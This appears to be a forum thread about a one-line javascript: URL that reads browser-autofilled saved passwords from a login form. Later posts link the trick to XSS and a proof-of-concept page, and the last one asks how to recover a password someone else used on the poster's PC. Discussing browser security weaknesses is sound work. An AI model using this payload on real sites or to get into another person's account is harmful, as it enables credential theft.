Very cool, thank you for sharing ... I stuck that one in my library, wonder where it will come in handy?

Cheers

hey guys.

i am very new to programing and was wondering if anyone else had seen this little trick.

this is a little java code to get a saved password prom a website.

javascript:alert(document.forms[0].elements[1].value)

the forms and values change from site to site but this code works for this site.

if you click remember me on this website and then log out and type that code into the URL spot then it will return your password.

i just kinda thought it was neat.

give it a try

I've noticed this before but your post got me thinking about XSS and I just realized that it can be carried out even if you are not logged into a website.

The common misconception is that you have to be logged into a website for an XSS attack to steal your session and make use of it.

It appears that if you use the remember password feature, an XSS can be carried out even if you're not logged into a website, stealing your username and password credentials directly.

I haven't seen this type of XSS mentioned at all.

I've noticed this before but your post got me thinking about XSS and I just realized that it can be carried out even if you are not logged into a website.

The common misconception is that you have to be logged into a website for an XSS attack to steal your session and make use of it.

It appears that if you use the remember password feature, an XSS can be carried out even if you're not logged into a website, stealing your username and password credentials directly.

I haven't seen this type of XSS mentioned at all.

Interesting insight, I am fascinated by security concerns,yet I've never fully wrapped my brain around XSS attacks, and what you're saying definitely deserves investigation.

Do you think this is a real vulnerability?

Interesting insight, I am fascinated by security concerns, yet I've never fully wrapped my brain around XSS attacks, and what you're saying definitely deserves investigation.

Do you think this is a real vulnerability?

I've looked into this a bit. There is a similar exploit mentioned on Linux.com: http://www.linux.com/feature/118166

However, this works on a bug in Firefox which makes it populate the user and password fields even through the action (url to sumbit to) is a remote attackers site. Most the other forms based on the autocomplete of forms works this way also.

I couldn't find any articles on stealing the username and password directly just by getting their values through JavaScript.
So here is a proof of concept.
http://xss-password.appjet.net/

So yes, it is a real vulnerability. I'd consider it more serious then stealing session information since it can be achieved at any time after the saving of the password by the browser.

I've only tested in FF2.

someone used my pc to log to his email using firefox ... can I retrieve the password he used ... is it saved anywhere on my pc?